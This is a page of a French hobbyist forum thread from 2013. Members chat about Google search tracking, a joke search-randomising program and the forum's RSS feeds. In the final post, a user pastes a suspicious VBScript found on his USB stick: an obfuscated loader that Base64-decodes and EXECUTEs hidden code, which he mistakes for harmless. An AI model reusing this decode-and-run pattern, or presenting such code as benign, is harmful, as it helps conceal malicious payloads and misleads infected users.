FAMAS Index du Forum

FAMAS
Faction armée des makers assoiffés de sang

FAQFAQ   RechercherRechercher   MembresMembres   GroupesGroupes   S’enregistrerS’enregistrer 
 ProfilProfil   Se connecter pour vérifier ses messages privésSe connecter pour vérifier ses messages privés   ConnexionConnexion 

Informatique BDM
Aller à la page: <  1, 2, 314, 15, 1642, 43, 44  >

Poster un nouveau sujet   Répondre au sujet    FAMAS Index du Forum -> Section Repos -> Réfectoire
Sujet précédent :: Sujet suivant  
Auteur Message
trotter

MessagePosté le: Mar 27 Aoû - 22:15 (2013)    Sujet du message: Informatique BDM Répondre en citant

PublicitéSupprimer les publicités ?
Revue du message précédent :

Bah même dilué dans du random, ils vont quand même voir que tu as été sur E&R.

Ou alors c'est une technique de défense...
"Non madame la juge, je n'y ai pas été, c'est mon programme random."...mais j'ai un doute sur l'efficacité.
Roi of the Suisse
Vétéran

MessagePosté le: Mar 27 Aoû - 22:18 (2013)    Sujet du message: Informatique BDM Répondre en citant

Mais le programme va sur E&R ! Et s'intéresse aux billets pour New York ! Et à construire des bombes ! Mais aussi pour les shampoings spéciaux pour soigner son intimité féminine, le cours du baril de nougat, les meubles ikéa, les frites, le Koweit etc.

TOUT ! :8X
Visiter le site web du posteur
trotter
Vétéran

MessagePosté le: Mar 27 Aoû - 22:24 (2013)    Sujet du message: Informatique BDM Répondre en citant

Oui mais si le gouvernement cherche à punir les gens qui cherchent à construire des frites ils s'en branlent que tu cherches le Koweit !§!!
Roi of the Suisse
Vétéran

MessagePosté le: Mar 27 Aoû - 22:50 (2013)    Sujet du message: Informatique BDM Répondre en citant

Si tout le monde a peur de google, tout le monde installe le logiciel, et tout le monde cherche tout.
Google ne sait plus rien sur personne.

Je vois pas ce que tu cherches à dire. Fais un scénario propre èsstépéh zulu
trotter
Vétéran

MessagePosté le: Mar 27 Aoû - 22:54 (2013)    Sujet du message: Informatique BDM Répondre en citant

Ah j'avais zappé que tu voulais faire installer ton programme à tout le monde.
C'est même plus génial là c'est carrément fantastique :porte

Quoi que si on faisait un petit spyware...
Roi of the Suisse
Vétéran

MessagePosté le: Mar 27 Aoû - 22:57 (2013)    Sujet du message: Informatique BDM Répondre en citant

Mais tout le monde l'aurait comme tout le monde a adblock trotter : pour se protéger, ça se répandrait :m~
sriden
Administrateur

MessagePosté le: Mer 28 Aoû - 08:27 (2013)    Sujet du message: Informatique BDM Répondre en citant

Ça leur sert vraiment à autre chose que de cibler les pubs, le pistage google ? Je vois mal les compagnies ou les sites de recrutement aller acheter à google la liste de mes recherches internet. zulu

Il faudrait utiliser les photos de Nemau pour illustrer le topic du verre d'eau de trotter.

kilam1110
Vétéran

MessagePosté le: Mer 28 Aoû - 15:14 (2013)    Sujet du message: Informatique BDM Répondre en citant

Bah si c'est connu, après ils font des stats genre "nombre de personnes de 25 ans ont recherché machin", ce qui aide les entreprises ou autres à mieux se référencer. Ou un truc du genre.
Mais c'est sûr qu'ils gardent tout ces enfoirés, ça leur servira sûrement un jour (déjà que les keufs peuvent demander à Google ce qu'ils ont sur toi pour enquêter, donc ça pue un peu).
sriden
Administrateur

MessagePosté le: Mer 28 Aoû - 18:12 (2013)    Sujet du message: Informatique BDM Répondre en citant

Non genre avant que je passe un entretien. Les stats toussa, je mettais ça plutôt dans le ciblage de pub. :--
trotter
Vétéran

MessagePosté le: Sam 21 Sep - 01:25 (2013)    Sujet du message: Informatique BDM Répondre en citant

Je sais pas si vous saviez, on a un rss sur le forum :
http://famas.majz.com/rss.php
sriden
Administrateur

MessagePosté le: Sam 21 Sep - 10:09 (2013)    Sujet du message: Informatique BDM Répondre en citant

C'nul, ça incite les gens à pas poster, vu qu'il regarde juste des listes de posts pris isolément et il faudrait qu'ils se connectent et qu'ils retrouvent le topic en question et tout pour pouvoir y poster.
Et en plus ils regardent des posts sans trop savoir où ils sont sur le forum, et sans voir les posts précédents de la discussion. Donc ils pigent rien et après ils sont tout nénervés parce qu'ils comprennent pas.
Je moinssoie. :m~
trotter
Vétéran

MessagePosté le: Sam 21 Sep - 13:10 (2013)    Sujet du message: Informatique BDM Répondre en citant

Moi je suis en train de me faire une page d'accueil avec les posts du famas, ceux d'oniro, de divers autres forums, des sites de news etc.

Quand on clique ça nous amène au topic.
Le "problème" c'est qu'on voit pas le forum privé, il va falloir que je passe de temps en temps sur le forum.
trotter
Vétéran

MessagePosté le: Sam 21 Sep - 13:11 (2013)    Sujet du message: Informatique BDM Répondre en citant

Ou alors on peut utiliser netvibes ou quoi.

Tu as cette super url sinon :
http://famas.majz.com/search.php?search_id=newposts
sriden
Administrateur

MessagePosté le: Sam 21 Sep - 15:33 (2013)    Sujet du message: Informatique BDM Répondre en citant

Il y a que sur oniro que je l'utilise parfois ce machin, quand le forum a un excédent de charme et me marque tous les topics comme lus alors que c'est pas le cas. Du coup je passe par cette liste.
Mais c'est un peu chiant de visiter un forum comme ça, j'ai l'impression d'être à l'usine "putain il me reste encore 21 posts à regarder. Et toi ? - 37 posts. Vivement la quille". :porte

Anonyme
Vétéran

MessagePosté le: Sam 21 Sep - 19:22 (2013)    Sujet du message: Informatique BDM Répondre en citant

Ça fait gagner du temps, t'as plus besoin d'aller dans les topic que t'osef juste pour faire marquer les messages comme lus.
Roi of the Suisse
Vétéran

MessagePosté le: Dim 3 Nov - 16:21 (2013)    Sujet du message: Informatique BDM Répondre en citant

J'ai un mystérieux "XGyreppr.vbs" dans une clé USB, il refuse de partir et ça m'énerve !!! :feu

Code:
EXECUTE (dbdbdbdbdb)
function ililililililili(data)
     ililililililili=decodeBase64(data)
end function
Function decodeBase64(ByVal base64String)
     Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
     Dim dataLength, sOut, groupBegin

base64String = Replace(base64String, vbCrLf, "")
     base64String = Replace(base64String, vbTab, "")
     base64String = Replace(base64String, " ", "")
     dataLength = Len(base64String)
     If dataLength Mod 4 <> 0 Then
          Err.Raise 1, "Base64Decode", "Bad Base64 string."
          Exit Function
     End If
     For groupBegin = 1 To dataLength Step 4
          Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
          numDataBytes = 3
          nGroup = 0

For CharCounter = 0 To 3
               thisChar = Mid(base64String, groupBegin + CharCounter, 1)

If thisChar = "=" Then
                    numDataBytes = numDataBytes - 1
                    thisData = 0
               Else
                    thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
               End If

If thisData = -1 Then
                    Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
                    Exit Function
               End If

nGroup = 64 * nGroup + thisData
          Next
          nGroup = Hex(nGroup)
          nGroup = String(6 - Len(nGroup), "0") & nGroup
          pOut =      Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
                    Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
                    Chr(CByte("&H" & Mid(nGroup, 5, 2)))
          sOut = sOut & Left(pOut, numDataBytes)
     Next
     decodeBase64 = sOut
End Function

Ça a pas l'air trop méchant, ça "décode" je sais pas trop quoi :wtf
Contenu Sponsorisé

MessagePosté le: Aujourd’hui à 01:14 (2017)    Sujet du message: Informatique BDM

Poster un nouveau sujet   Répondre au sujet    FAMAS Index du Forum -> Section Repos -> Réfectoire Toutes les heures sont au format GMT + 2 Heures
Aller à la page: <  1, 2, 314, 15, 1642, 43, 44  >
Page 15 sur 44

Sauter vers:  

Index | creer un forum gratuit | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation